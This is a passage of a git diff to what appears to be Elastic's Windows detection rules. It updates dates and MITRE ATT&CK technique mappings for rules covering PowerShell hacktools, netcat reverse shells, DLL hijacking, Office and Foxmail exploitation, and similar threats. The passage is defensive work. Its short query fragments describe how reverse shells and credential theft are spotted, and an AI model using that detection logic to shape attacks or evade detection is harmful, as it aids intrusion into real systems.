+[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 62b894c0d72..98d60148ce0 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -140,36 +140,49 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml index 1724e0f677c..084cd4eff65 100644 --- a/rules/windows/execution_initial_access_foxmail_exploit.toml +++ b/rules/windows/execution_initial_access_foxmail_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,26 +90,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml index b0fc6db6048..1f7219d965d 100644 --- a/rules/windows/execution_initial_access_via_msc_file.toml +++ b/rules/windows/execution_initial_access_via_msc_file.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,27 +100,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -131,10 +134,25 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.014" +name = "MMC" +reference = "https://attack.mitre.org/techniques/T1218/014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml index b6d8c918d59..cef5e3fb0f2 100644 --- a/rules/windows/execution_initial_access_wps_dll_exploit.toml +++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,26 +88,49 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 979a2d927a3..330a2bc739e 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2024/08/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,16 +99,34 @@ sequence with maxspan=2h [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -119,10 +137,7 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_nodejs_susp_patterns.toml b/rules/windows/execution_nodejs_susp_patterns.toml index 56fb9fb8bc8..4bdf3d086cd 100644 --- a/rules/windows/execution_nodejs_susp_patterns.toml +++ b/rules/windows/execution_nodejs_susp_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] @@ -109,11 +109,25 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_notepad_markdown_child_process.toml b/rules/windows/execution_notepad_markdown_child_process.toml index c7f3b8f24a8..13e0813ef61 100644 --- a/rules/windows/execution_notepad_markdown_child_process.toml +++ b/rules/windows/execution_notepad_markdown_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/16" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,11 +81,21 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 8e6c5f0f7eb..1c53fa9db0e 100644 --- a/rules/windows/execution_posh_hacktool_functions.toml +++ b/rules/windows/execution_posh_hacktool_functions.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -310,22 +310,166 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.006" +name = "DCSync" +reference = "https://attack.mitre.org/techniques/T1003/006/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.006" +name = "Group Policy Preferences" +reference = "https://attack.mitre.org/techniques/T1552/006/" + +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique]] +id = "T1482" +name = "Domain Trust Discovery" +reference = "https://attack.mitre.org/techniques/T1482/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index 2053274cec8..d52be5d20cc 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,34 +118,44 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index f5e2c08a17b..25a637bbd54 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,10 +105,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -124,10 +126,30 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 2ca0d6e9e10..3abeef4bedc 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/10/14" +updated_date = "2026/03/24" [rule] @@ -75,10 +75,12 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -89,9 +91,20 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index 67a11ba82f0..83194087722 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,29 +82,46 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index bce62a907c5..bc04b569daa 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,41 +80,64 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index 8bc7d0e44cc..5243860e944 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] @@ -104,20 +104,27 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index 26b1f2df891..3c92dda7f97 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -60,14 +60,31 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1129" name = "Shared Modules" reference = "https://attack.mitre.org/techniques/T1129/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_susp_javascript_via_deno.toml b/rules/windows/execution_susp_javascript_via_deno.toml index ec8fe357c7a..97d11c50775 100644 --- a/rules/windows/execution_susp_javascript_via_deno.toml +++ b/rules/windows/execution_susp_javascript_via_deno.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,10 +77,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" @@ -90,3 +92,29 @@ reference = "https://attack.mitre.org/techniques/T1059/007/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 9f27f9612ae..997ab764138 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -103,15 +104,31 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" 